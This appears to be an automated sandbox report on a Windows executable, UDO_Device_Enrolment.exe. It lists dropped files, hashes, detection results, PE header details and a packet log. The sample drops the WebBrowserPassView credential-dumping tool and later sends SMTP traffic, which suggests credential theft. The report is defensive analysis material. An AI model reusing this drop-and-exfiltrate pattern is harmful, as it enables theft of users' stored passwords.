Process:	C:\Users\user\Desktop\UDO_Device_Enrolment.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4375
Entropy (8bit):	5.3636481786596555
Encrypted:	false
SSDEEP:	96:iqEYqGgAo3nwmI0qeZaJtIz6cxBAmRvBIQYrjVxmc5qCqKP5tPqIgvtzG1mqK:iqEYqGDcwmI0qe4Iz6rjjqCqKRtPqNv/
MD5:	19E6229E006FADA6CBF3D97DD2EC1F97
SHA1:	D006AA8B3AF8C33D1F950C89DE177172C9A5CB37
SHA-256:	5BCE291EB643CEB29E136CFC026EFF74B2032329109A1DE2497FCC03BA538AF6
SHA-512:	67AAC07C2BAFF370F5141F683B697DB4B3959F26E08B1A9362F28D03D17DE1BD3D0C5ADF6A08D761A53AC2F32EDE0E60798C8AB2F35601088C665E601BAB4DDC
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\8b2774850bdc17a926dc650317d86b33\System.Management.Automation.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages

C:\Users\user\AppData\Local\Temp\bhvFCA.tmp

Download File

Process:	C:\temp\Windows32\WebBrowserPassView.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xaa99dbf8, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	26738688
Entropy (8bit):	0.9864001687687571
Encrypted:	false
SSDEEP:	24576:OZwqTaxxujQxeJ2lLX/SAZfV+yVHgSFDb7uBi:+QxeJCPT1
MD5:	C53785D3E4410B0670A9D0F1F4B63F75
SHA1:	E0138D639089944A185069AF111FBD42D80F0126
SHA-256:	AED096BECCE3BD56C06EB9D7CA36289CC087623AB4348139C31E9E195D3D6017
SHA-512:	6831D9D902EAA04BAB67762453C1BDAAE22B9A7295ADF86F5D7863E18B2BE9B64107EEC4F6B51F10112F7645BD645BA086F23128A3E5D1F7C6DDFE105C99AFDD
Malicious:	false
Reputation:	low
Preview:	....... .......t;.......te3....wg.......................C.....'&...z..*&...zW.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z..........................................................................................................................................................................................................................................7....z...................G]2/....zK.........................................................................................................................................................................................................................................................................................................................................................................................

C:\temp\Windows32\HWID.txt

Download File

Process:	C:\temp\Windows32\WebBrowserPassView.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\temp\Windows32\WebBrowserPassView.exe

Download File

Process:	C:\Users\user\Desktop\UDO_Device_Enrolment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	402944
Entropy (8bit):	6.666814366272581
Encrypted:	false
SSDEEP:	6144:QNV8uoDRSdm3v93UFlssFHgkU9KvKUXr/BAO9N/oXrsAteTQokizYu:eSDRSm3vrugB9KvKk9RO8k3u
MD5:	2024EA60DA870A221DB260482117258B
SHA1:	716554DC580A82CC17A1035ADD302C0766590964
SHA-256:	53043BD27F47DBBE3E5AC691D8A586AB56A33F734356BE9B8E49C7E975241A56
SHA-512:	FFCD4436B80169BA18DB5B7C818C5DA71661798963C0A5F5FBAC99A6974A7729D38871E52BC36C766824DD54F2C8FA5711415EC45799DB65C11293D8B829693B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\temp\Windows32\WebBrowserPassView.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81% Antivirus: Metadefender, Detection: 43%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................9.......9............... ......................;.......;.......;......Rich............PE..L....hy`.....................P......,i............@..................................................................................@..................................................................................p............................text............................... ..`.rdata..............................@..@.data..............................@....rsrc........@......................@..@........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	2.1445311890183776
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	UDO_Device_Enrolment.exe
File size:	208384
MD5:	33d42728d32ae2eae31e4e1666b9b41c
SHA1:	8eb8f3dd4394d95cbe0294903f11df25966e483a
SHA256:	125fabbc234e4aef84704adad60213c510611aa5ee1a86fc238d6497df121e21
SHA512:	9548f6328c27b0616ab4a44fa05735189ec14eb5bf302616877faa3a8c2473a378266ffd2435c7f578f99776ec4d1d6e3d82ac71df70bdf18161f6062360c27a
SSDEEP:	768:h4KUggNBTPsmV5II2Q0oXbOfq1mkmjJKQfsPE2d1NL3gkGMsG:h4KUggTTPRiQLbOamUPRvR3zG
TLSH:	CF14B7147598D009E2EB7A386FD0D9F10775AE6A6901CA672CE43F8F35FE7079900266
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(c................................. ........@.. ....................................@................................

File Icon


Icon Hash:	0000000000000000

Static PE Info

General

Entrypoint:	0x40bc2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6328F5BC [Mon Sep 19 23:05:32 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbbdc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x28a18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9c34	0x9e00	False	0.4380439082278481	data	5.584429363621972	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x28a18	0x28c00	False	0.07857433857361963	data	0.9285718626571026	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc5c8	0xa11	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0xcfe0	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x1d808	0x94a8	data
RT_ICON	0x26cb0	0x5488	data
RT_ICON	0x2c138	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON	0x30360	0x25a8	data
RT_ICON	0x32908	0x10a8	data
RT_ICON	0x339b0	0x988	data
RT_ICON	0x34338	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x347a0	0x84	data
RT_VERSION	0xc2b0	0x318	data
RT_MANIFEST	0x34828	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2022 20:29:03.325098038 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.325162888 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:03.325263023 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.371992111 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.372046947 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:03.426384926 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:03.426652908 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.437944889 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.437978983 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:03.438420057 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:03.479020119 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.769378901 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:03.811383009 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.006722927 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.006778002 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.006860971 CEST	443	49700	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.006926060 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.006958008 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.011122942 CEST	49700	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.034166098 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.034229040 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.034400940 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.035339117 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.035365105 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.072510004 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.094765902 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.135363102 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.297044992 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.297133923 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.297180891 CEST	443	49701	140.82.121.4	192.168.2.3
Sep 25, 2022 20:29:04.297375917 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.300069094 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.309123039 CEST	49701	443	192.168.2.3	140.82.121.4
Sep 25, 2022 20:29:04.337066889 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.337127924 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.337229967 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.337805033 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.337827921 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.377722979 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.377813101 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.381613016 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.381644011 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.382064104 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.383378029 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.427366972 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.594316006 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.596509933 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.596585989 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.596623898 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.596657991 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.596683025 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.596750021 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.599572897 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.599647045 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.599679947 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.599694967 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.599714994 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.611481905 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.611562967 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.611696005 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.611726999 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.611747026 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.613197088 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.613296986 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.613298893 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.613327026 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.613377094 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.615441084 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.615510941 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.615550995 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.615566969 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.615586996 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.617321968 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.617396116 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.617404938 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.617419958 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.617466927 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.627810955 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.627882957 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.627990961 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.628022909 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.628041983 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.630597115 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.630661011 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.630784035 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.630799055 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:04.835375071 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:04.885324001 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:05.095376015 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:05.095447063 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:05.535373926 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:05.535451889 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:06.395375967 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:06.396259069 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:08.095376015 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:08.095453978 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.219880104 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.219911098 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.219924927 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.219976902 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.219995022 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.219999075 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220016003 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220029116 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220040083 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.220045090 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220052958 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220062017 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.220067024 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220091105 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220096111 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.220102072 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220118999 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220125914 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220143080 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220144033 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.220160007 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220166922 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220175028 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220190048 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.220194101 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220202923 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.220231056 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.220268011 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.350991011 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.351027966 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.351110935 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.352329969 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.352334976 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352348089 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352407932 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352415085 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.352426052 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352483988 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.352490902 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352503061 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352539062 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.352544069 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352552891 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.352582932 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.352596998 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.360172033 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.360187054 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.360270977 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.360891104 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.360894918 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.360907078 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.360914946 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.360980034 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.360985041 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.360996008 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.361037970 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.361042976 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.361052990 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.361082077 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.361085892 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.361118078 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.361135960 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.365612984 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.365621090 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.365674019 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.366393089 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.366398096 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.366409063 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.366416931 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.366466999 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.366472006 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.366514921 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.366518021 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.366539001 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.366545916 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.366576910 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.366606951 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.372160912 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.372170925 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.372235060 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.372936010 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.372940063 CEST	443	49702	185.199.108.133	192.168.2.3
Sep 25, 2022 20:29:10.372997046 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.377841949 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.378509998 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:10.384869099 CEST	49702	443	192.168.2.3	185.199.108.133
Sep 25, 2022 20:29:17.503453016 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.521038055 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.521131992 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.539499044 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.540721893 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.558779001 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.559046030 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.576828957 CEST	587	49705	52.97.188.70	192.168.2.3
Sep 25, 2022 20:29:17.581566095 CEST	49705	587	192.168.2.3	52.97.188.70
Sep 25, 2022 20:29:17.601500988 CEST	587	49705	52.97.188.70	192.168.2.3
